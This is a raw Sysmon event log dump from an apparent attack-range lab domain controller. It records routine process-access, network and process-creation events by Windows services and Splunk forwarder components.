13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199868Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199867Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199866Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199865Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002199902Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.512{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55084-false10.0.1.12-8089- 23542300x80000000000000002199901Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:08.048{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66EA87CD73D8E251C01FBA874A71AD59,SHA256=31F6DACAC22DAD4074C6B2FA84B1B170983002DC8C2F0C5F0FAB478FD8C00449,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199903Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:09.048{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0418550627FE42B754E7CBBCD8D7216A,SHA256=3B3E83AF655EBE8ACCD01B500C8FBE2F56B79A055D935A70F1C6D986138EAE86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199905Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:10.111{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=232BD0D4EE42CA40C4A1379463894CC4,SHA256=11D78E76E63646AE2E31FD6FC25798CCEE5E1804F344C607D5934769E196C867,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199904Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:10.064{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F00881A0A891193F97CF4F4ECAA34318,SHA256=0C6CC809AD52D8D84B3F3474227D61AB7EDB36A2A894FD7CFAB46F20C1EC2787,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199907Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:06.934{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55085-false10.0.1.12-8000- 23542300x80000000000000002199906Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:11.298{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B37123FDFBC007CDD794954FBDFED30,SHA256=2B58E42CE68F76B98F3797CE2DD218BAED6F6A7F70B85334BAA61F138A00053B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199908Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:12.314{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68EC8BEF8857600F6054C3AE838C1799,SHA256=75A8AEC143A9858C5E4F1C32D6D69E429841570670C7A9F8CE3A9AE03CD0E777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199909Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:13.330{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E862FD4F4D56E07D82956F422B02523,SHA256=A39351AE0DBA0A8A440F0DBEE683F6FF6A12783030F695AA7A446B855C18A3E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199910Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:14.361{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=334D0802D6ED949CB2E0440714FCB10A,SHA256=121AADC7064767A8A03019D75A2F5DEE1CAC830BEE9B47665598184CE0CE8D9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199914Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:15.564{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=674B530A0174862A4F39EDB89C52C918,SHA256=0A7F9F38A770EC334285DDD597753D92494E13B84B7E567571D46CB18171BC3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199913Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:11.950{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55086-false10.0.1.12-8000- 23542300x80000000000000002199912Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:15.142{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=568677EF49AA01BDC419CC7899CFB7B4,SHA256=4B23215EBE5A2FE083CE322374269B6FB825CF5FA05E4B9BFD3A0F0E49B03338,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199911Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:15.142{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B6E73ECDF8D5211D39032C8950B4E1E,SHA256=1C3E74E66EE17EF5FD53773BBE66DB07E3984D957D98B6C5B2063A946783F0BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199915Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:16.564{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50D1AC97A41C8BF19CA1D7FF698A1EF3,SHA256=CA315E75C4F71BF08483DA15C9081307F732F3187945AA844C6EA97F509BE4C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199925Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.752{5ABCFE62-E5D5-6040-C84D-00000000AD01}70086528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199924Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.627{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E5D5-6040-C84D-00000000AD01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199923Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.627{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199922Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.627{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199921Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.627{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199920Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.627{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199919Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.627{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E5D5-6040-C84D-00000000AD01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199918Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.627{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E5D5-6040-C84D-00000000AD01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199917Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.627{5ABCFE62-E5D5-6040-C84D-00000000AD01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002199916Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.627{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ABCDB7CA5B1C6636479D5FC68279FC1,SHA256=755638F555AFEBB24993647E3ED7BDC1CFC8CA8D446BD253805BAB4E242915D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199944Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.970{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E5D6-6040-CA4D-00000000AD01}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199943Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.970{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199942Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.970{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199941Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.970{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199940Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.970{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199939Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.970{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E5D6-6040-CA4D-00000000AD01}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199938Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.970{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E5D6-6040-CA4D-00000000AD01}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 